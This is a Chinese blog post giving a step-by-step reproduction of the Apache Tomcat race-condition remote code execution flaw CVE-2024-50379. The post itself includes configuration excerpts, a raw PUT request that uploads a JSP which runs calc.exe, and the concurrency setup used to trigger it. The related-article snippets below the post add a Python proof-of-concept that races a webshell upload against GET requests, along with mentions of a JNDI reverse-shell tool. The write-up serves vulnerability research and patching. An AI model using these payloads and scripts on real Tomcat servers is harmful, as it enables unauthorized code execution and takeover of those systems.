Apache Tomcat RCE 稳定复现 保姆级!(CVE-2024-50379)附视频+POC

最新推荐文章于 2025-03-21 17:48:54 发布
最新推荐文章于 2025-03-21 17:48:54 发布
阅读量7.9k 收藏 18
点赞数 32
文章标签: apache tomcat 音视频 网络攻击模型 web安全 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63217130/article/details/144588392
版权

原文链接

Apache Tomcat 最新RCE 稳定复现+分析 保姆级!!!附复现视频+POC

前言

最近爆出 Apache Tomcat条件竞争导致的RCE,影响范围当然是巨大的,公司也及时收到了相关情报,于是老大让我复现,以更好的帮助公司进行修复漏洞。

复现难度其实并不大,但是成功率很低,相信很多师傅也在复现,希望能够成功,所以我对“成功率”进行了一点点研究,希望能够提高师傅们复现成功的概率。

环境搭建

经过多次的尝试,建议大家使用java8不要用太高的java版本 否则难以复现成功(关注后台回复20241219可以获取跟我一模一样的漏洞复现环境和POC)这里使用的环境如下:

jre1.8.0_202

apache-tomcat-9.0.63

windows虚拟机

配置环境变量

这里一定要配置JAVA_HOME否则会报错

需要将这个版本的java的环境变量置顶,防止其他版本的干扰,大家应该都明白

配置CATALINA_BASE

这下环境变量就已经配置齐了 这个时候就已经可以正常启动tomcat了 运行这个批处理文件

启动成功(乱码无所谓的 web.xml改一下GBK即可)

漏洞分析

影响版本

11.0.0-M1 <= Apache Tomcat < 11.0.2

10.1.0-M1 <= Apache Tomcat < 10.1.34

9.0.0.M1 <= Apache Tomcat < 9.0.98

漏洞原理

首先来看看著名的CVE-2017-12615,我们查看tomocat的配置 (conf/web.xml)

    <!-- The mapping for the default servlet -->
    <servlet-mapping>
        <servlet-name>default</servlet-name>
        <url-pattern>/</url-pattern>
    </servlet-mapping>

    <!-- The mappings for the JSP servlet -->
    <servlet-mapping>
        <servlet-name>jsp</servlet-name>
        <url-pattern>*.jsp</url-pattern>
        <url-pattern>*.jspx</url-pattern>
    </servlet-mapping>

当请求的后缀为jsp或jspx的时候交由JSP servlet进行处理请求,此外交给default servlet进行处理请求。而我们查看CVE-2017-12615的payload可知,它对文件后缀采取了一些绕过,例如PUT一个1.jsp/、1.jsp空格、1.jsp%00从而绕过JSP servlet的限制,让default servlet来处理请求。当default servlet处理PUT请求时如下图

    @Override
    protected void doPut(HttpServletRequest req, HttpServletResponse resp)
        throws ServletException, IOException {

        if (readOnly) {
            sendNotAllowed(req, resp);
            return;
        }

        String path = getRelativePath(req);

        WebResource resource = resources.getResource(path);

        Range range = parseContentRange(req, resp);

        if (range == null) {
            // Processing error. parseContentRange() set the error code
            return;
        }

        InputStream resourceInputStream = null;

        try {
            // Append data specified in ranges to existing content for this
            // resource - create a temp. file on the local filesystem to
            // perform this operation
            // Assume just one range is specified for now
            if (range == IGNORE) {
                resourceInputStream = req.getInputStream();
            } else {
                File contentFile = executePartialPut(req, range, path);
                resourceInputStream = new FileInputStream(contentFile);
            }

            if (resources.write(path, resourceInputStream, true)) {
                if (resource.exists()) {
                    resp.setStatus(HttpServletResponse.SC_NO_CONTENT);
                } else {
                    resp.setStatus(HttpServletResponse.SC_CREATED);
                }
            } else {
                resp.sendError(HttpServletResponse.SC_CONFLICT);
            }
        } finally {
            if (resourceInputStream != null) {
                try {
                    resourceInputStream.close();
                } catch (IOException ioe) {
                    // Ignore
                }
            }
        }
    }

会去检查配置文件中的readonly的值是否为false,如果是true的话就直接return也就是不允许put请求,所以我们需要在配置文件中进行如下设置 (conf/web.cml) 注意是default servlet,因为上面讲了我们最终处理put请求是default servlet

    <servlet>
        <servlet-name>default</servlet-name>
        <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>

        <init-param>
            <param-name>debug</param-name>
            <param-value>0</param-value>
        </init-param>
        <init-param>
            <param-name>listings</param-name>
            <param-value>false</param-value>
        </init-param>
        <init-param>
            <param-name>readonly</param-name>
            <param-value>false</param-value>
        </init-param>
        <load-on-startup>1</load-on-startup>
    </servlet>

最终就可以进行put上传shell了,这个就是CVE-2017-12615

那么再看看最近很火的CVE-2024-50379。原理是条件竞争,通过并发put文件上传非标准后缀的“jsp”,并不断发起get请求一个标准后最的“jsp”文件,最终由于服务器的大小写不敏感,导致请求成功造成RCE。

看看pyload是put一个xxx.Jsp(也可以PUT html........),为什么长这样呢?阅读了上文,固然就明白了。 当然是要绕过jsp servlet的后缀匹配规则了然后让default servlet去处理请求。

现在我们尝试PUT一下 数据包如下

PUT /test.Jsp HTTP/1.1
Host: 192.168.19.135:8080

<% Runtime.getRuntime().exec("calc.exe");%>

返回状态码是201代表上传成功 可以去webapps/ROOT目录看到

再次重放请求的时候就是204的状态码了 说明文件已经存在

接下来开始复现该漏洞 我用的是window虚拟机 而不是真机,因为我电脑内存太大了,可能效果不会很明显,毕竟要用到条件竞争,所以如果想成功率高一点建议用虚拟机,把内核、内存大小设置小一点。

yakit-发送到webFuzzer 发三个

第一个

第二个

第三个 并发线程建议大于前面两个

开弹

Ting丶丶
关注
【漏洞复现Apache Tomcat条件竞争代码执行漏洞(CVE-2024-50379
李火火的安全圈
12-23 920
由于Windows文件系统与Tomcat在路径大小写区分处理上的不一致,当启用了默认servlet的写入功能(设置readonly=false且允许PUT方法),未经身份验证的攻击者可以构造特殊路径绕过Tomcat的路径校验机制,通过条件竞争不断发送请求上传包含恶意JSP代码的文件触发Tomcat对其解析和执行,从而实现远程代码执行。
CVE-2024-50379Apache Tomcat - 通过启用写入功能的默认 servlet 进行 RCE(内含FOFA hunter Shodan搜索语法)
weixin_47075747的博客
12-22 349
该漏洞由 Nacl、WHOAMI、Yemoli 和 Ruozhi 发现。Apache Tomcat 10.1.0-M1 至 10.1.33。Apache Tomcat 11.0.0-M1 至 11.0.1。Apache Tomcat 9.0.0.M1 至 9.0.97。参数设置为非默认值 false)表示不区分大小写。绕过 Tomcat 的大小写检查,导致上传的文件。文件系统,在负载下并发读取和上传同一文件可以。将其视为 JSP,从而导致远程代码执行。受影响版本的用户应采取以下措施之一。
Apache Tomcat条件竞争致远程代码执行漏洞复现CVE-2024-50379)(脚本)
m0_74823705的博客
12-27 1419
当默认 Servlet 的 readonly 参数被设置为 false(非默认配置)并允许使用 PUT 方法上传文件时,攻击者能够上传包含恶意 JSP 代码的文件并通过条件竞争不断发送请求,触发 Tomcat 对其解析和执行,最终实现远程代码执行。Tomcat的主要特点包括易于配置和管理、良好的兼容性以及高性能和可靠性。**因为使用大写的Jspx,Jsp的时候,tomcat用的DefaultServlet来处理允许文件上传。的一个核心项目,支持最新的Servlet和JSP规范,并且是免费的开源软件。
Tomcat RCECVE-2025-24813)复现
Neolock的博客
03-21 2521
它由 Apache 软件基金会下的 Jakarta 项目开发,是目前最流行的 Java Web 服务器之一。这里需要注意Content-Range的分块值需要与Content-Length保持一致,且大于当前文件的长度。我们都知道tomcat是Java语言开发的,所以需要JAVA环境,我这里的Java环境是1.8.0_441。当文件被上传成功后,大概30s之内payload会被自动触发,随之文件会被清除。
【漏洞复现Apache Tomcat 条件竞争/远程代码执行 CVE-2024-50379 漏洞原理详尽分析
仇辉攻防的博客
12-26 497
一、如果我们不搞并发,先PUT一个不符合标准的扩展名的.Jsp脚本,再去GET一个符合标准的.jsp脚本,那么是GET不到的,因为这个过程经历了完全的安全检查和路径匹配,tomcat压根不会指到刚才PUT进去的.Jsp,因为你访问的是符合标准的.jsp,尽管windows文件系统不分,但是tomcat会区别。这是一个条件竞争引起的漏洞,先通过条件竞争(并发数据包)GET到上传的恶意脚本,实现你想搞什么就搞什么,那当然RCE了,所以市面上都称该漏洞为远程代码执行漏洞。至此,成功复现该漏洞。
【漏洞复现Tomcat 远程代码执行漏洞 (CVE-2024-50379)
总有人间一两风,填我十万八千梦
12-23 652
Apache Tomcat 存在一个远程代码执行漏洞,当默认Servlet的readonly参数被设置为 false时,攻击者可以利用条件竞争,使用PUT方法上传恶意代码并触发执行,导致服务器失陷。
CVE-2024-50379漏洞复现
qq_61972142的博客
01-03 4654
CVE-2024-50379Apache Tomcat 条件竞争文件上传漏洞 Apache Tomcat作为一款开源的servlet容器,在全球范围内被大量的企业以及开发者所使用,用来搭建各类的web应用,其安全性也极其的重要; 目录 1、漏洞介绍 2、漏洞影响的版本范围 3、漏洞复现环境搭建 4、复现过程 5、漏洞修复建议 1、漏洞介绍 Apache Tomcat存在着TOCTOU竞争条件的远程代码执行漏洞,该漏洞是因为Apache Tomcat在编译解析jsp期
Apache Tomcat 远程代码执行漏洞预警(CVE-2024-50379)
m0_37633833的博客
01-07 798
近日,Apache Tomcat官方发布安全公告,披露Apache Tomcat 在特定版本中存在一处远程代码执行漏洞(CVE-2024-50379)。由于Apache Tomcat在校验文件路径时存在缺陷,如果对不区分大小写的文件系统启用了默认 servlet 的写入功能(将 readonly 初始化参数设置为非默认值 false),则在负载下同时读取和上传同一文件可以绕过 Tomcat 的大小写敏感检查,并导致上传的文件被视为 JSP,从而导致远程代码执行。
图片服务器
whinsist的专栏
07-05 307
1.图片服务器源码 2.图片服务器tomcat配置(tomcat/config/web.xml)         default         org.apache.catalina.servlets.DefaultServlet                     debug             0
网安瞭望台第18期:警惕新型攻击利用Windows Defender绕过终端检测、CVE-2024-50379 漏洞利用工具分享
不忘初心,护天下安全!
12-26 948
具体而言,拥有 “admin”“federation”“operations”“portal” 或 “steering” 这类特权角色的用户,只需向 deliveryservice_request_comments 端点发送特制的 PUT 请求,就能针对底层数据库执行任意 SQL 命令,属于 CWE-89 类漏洞,即 SQL 命令中特殊元素的不当中和(也就是 “SQL 注入”)。在最严峻的状况下,具备域管理员权限的攻击者,能在整个组织内部散播恶意 WDAC 策略,系统性地让所有端点的 EDR 传感器瘫痪。
Apache Tomcat RCE漏洞复现CVE-2025-24813)
weixin_55010563的博客
03-15 975
使用 partial PUT 请求将恶意的序列化数据写入到会话文件中,在开启文件会话持久化(默认存储位置),并且在文件上传未完成的情况下,内容会被临时存储在 Tomcat 的工作目录work\Catalina\localhost\ROOT。尝试使用 Tomcat 9.0.98 版本复现:https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.98/bin/apache-tomcat-9.0.98.zip。
CVE-2019-0232 Tomcat RCE 远程命令执行漏洞 复现环境
04-18
件是对CVE-2019-0232 Tomcat RCE 远程命令执行漏洞 的复现环境。 将文件下载到本地,直接运行tomcat 启动服务器,地址栏输入 http://localhost:8080/cgi-bin/hello.bat?c:/windows/system32/net user 即可看到漏洞效果,请勿非法使用,仅供学习研究
exp:CVE-2024-2961将phpfilter任意文件读取提升为远程代码执行(RCE
10-30
CVE-2024-2961这个案例中,存在一个漏洞可以被用来进行任意文件读取。这表示攻击者能够读取服务器上任何文件的内容。从安全性的角度看,这已经相当危险,因为它可能泄露敏感配置文件、源代码或者其他重要数据。 ...
CVE-2024-36104 Apache OFBiz路径遍历RCE漏洞复现POC
mashiro_hibiki的博客
06-05 2074
高质量安全知识星球社区,致力于漏洞挖掘,渗透技巧,安全资料,星球承诺会持续更新0/1/NDay及对应的批量利用工具,团队内部漏洞库,内外网攻防技巧,你所需要的各类安全工具和资料以及团队师傅们最新的学习研究成果。,安全技术水平的催化者,星球针对成员的技术问题,快速提供思考方向及解决方案,并为星友提供多种方向的学习资料、安全工具、POC&EXP以及各种学习笔记等,以引导者和催化剂的方式助力安全技术水平的提升。Apache_OFBiz是一套基于通用架构的企业应用程序,使用通用数据,逻辑和流程组件。
Apache OFBiz 路径遍历导致RCE漏洞复现CVE-2024-36104)
0xSec
06-04 2530
Apache OFBiz 18.12.14之前版本存在命令执行漏洞,该漏洞源于org.apache.ofbiz.webapp.control.ControlFilter类对路径(请求URL中的特殊字符(如 ;、%2e)限制不当导致攻击者能够绕过后台功能点的过滤器验证,并通过/webtools/control/ProgramExport接口的编程导出功能执行任意Groovy代码获取系统权限。
CVE-2024-50379, CVE-2024-54677】:Apache Tomcat中的远程代码执行(RCE)和拒绝服务(DoS),评分5.3 - 9.8(文末含搜索语法)
weixin_47075747的博客
12-22 301
【代码】【CVE-2024-50379, CVE-2024-54677】:Apache Tomcat中的远程代码执行(RCE)和拒绝服务(DoS),评分5.3 - 9.8(文末含搜索语法)
阿一网络安全培训第60天——Apache Druid RCE漏洞复现及修复(CVE-2023-25194) ​​​​​​​
Ayixy的博客
05-24 912
2.使⽤ldap://vps ip:1389/Basic/Command/Base64/[base64_encoded_cmd]进⾏攻击。Kafka 是⼀个开源的分布式消息系统,Kafka 可以处理⼤量的消息和数据流,具有⾼吞吐量、低延迟、java -jar JNDIExploit-1.0-SNAPSHOT.jar:监听,可反弹shell。的特点,⼴泛应⽤于实时监控、事件驱动分析、⽤户⾏为分析、⽹络安全等领域。JNDI注⼊漏洞,可通过该漏洞在服务器端任意执⾏代码,写⼊后⻔,获取服务器权限,进⽽控制整个。
Tomcat漏洞 CVE-2019-0232 RCE漏洞
blackmagic的博客
08-13 576
当 CreateProcess 中的参数为 bat 文件或是 cmd 文件时,会调用 cmd.exe , 故最后会变成 cmd.exe /c “arg.bat & dir”,而Java的调用过程并没有做任何的转义,所以在Windows下会存在漏洞。CGI支持是使用Servlet类org . Apache . catalina . servlets . CGI servlet实现的,传统上,这个servlet被映射到URL模式“/cgi-bin/*”。默认情况下,Tomcat中禁用CGI支持。
Tomcat RCE | CVE-2024-50379条件竞争RCE复现,带视频教程及POC
最新发布
04-05
### 关于Tomcat CVE-2024-50379 RCE复现方法 #### 漏洞概述 Apache TomcatCVE-2024-50379 是一种基于条件竞争的远程代码执行漏洞。该漏洞允许攻击者通过特定方式上传非标准后缀的 JSP 文件,并利用服务器对大小写的不敏感特性,触发目标系统的任意代码执行[^2]。 --- #### 复现步骤说明 以下是针对此漏洞的一般性复现流程: 1. **环境准备** 攻击者需搭建一个与目标版本一致的 Apache Tomcat 测试环境,确保其配置支持文件上传功能。例如,启用 WebDAV 或其他可接受 PUT 请求的功能模块。 2. **构造恶意文件** 创建一个具有非标准扩展名(如 `.jsp_` 而不是 `.jsp`)的恶意脚本文件。此类文件通常不会被立即解析为 JSP 页面,从而绕过某些安全检测机制。 示例代码如下: ```java <%@ page import="java.util.*, java.io.*"%> <% Process p = Runtime.getRuntime().exec("id"); BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream())); String line; while ((line = in.readLine()) != null) { out.println(line); } %> ``` 3. **并发请求操作** 使用工具发送多个 HTTP `PUT` 请求来上传上述恶意文件至目标路径;与此同时,持续向同一目录下的合法命名(即带有 `.jsp` 扩展名)的目标发起高频次访问尝试。这种行为旨在捕捉到因竞态条件而产生的短暂时间窗口,在这期间恶意文件可能被错误识别并处理成真正的 JSP 页面。 4. **验证效果** 如果一切顺利的话,则可以通过浏览器或其他客户端直接调用已部署成功的恶意程序地址完成命令注入测试工作。此时应该能够看到预期返回的结果数据包内含有所执行操作系统指令所产生的相应反馈信息。 --- #### 视频教程资源推荐 对于希望更直观了解整个过程的学习者来说,网络上有不少高质量的教学视频可供参考学习。其中就包括一篇名为《Apache Tomcat RCE 稳定复现 保姆!(CVE-2024-50379)视频+POC》的文章链接分享出了完整的演示录像以及配套使用的 Python 脚本来简化实际动手环节中的复杂度。 --- #### POC (Proof Of Concept) Code Example 下面给出一段简单的 python poc 实现用于辅助理解如何自动化实施以上提到的技术细节: ```python import requests, threading def upload_payload(url): headers={"Content-Type":"application/octet-stream"} with open('malicious.jsp_', 'rb') as f: r=requests.put(f"{url}/test/malicious.jsp_", data=f.read(),headers=headers) def trigger_exploit(url): while True: try: resp=requests.get(f'{url}/test/MALICIOUS.JSP') if "uid" in str(resp.content):print("[+] Exploited!");break except Exception as e:pass if __name__=='__main__': url=input("Enter target URL:") t1=threading.Thread(target=upload_payload,args=(url,)) t2=threading.Thread(target=trigger_exploit ,args=(url,)) t1.start();t2.start() ``` 注意:仅限研究用途,请勿非法使用! --- ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值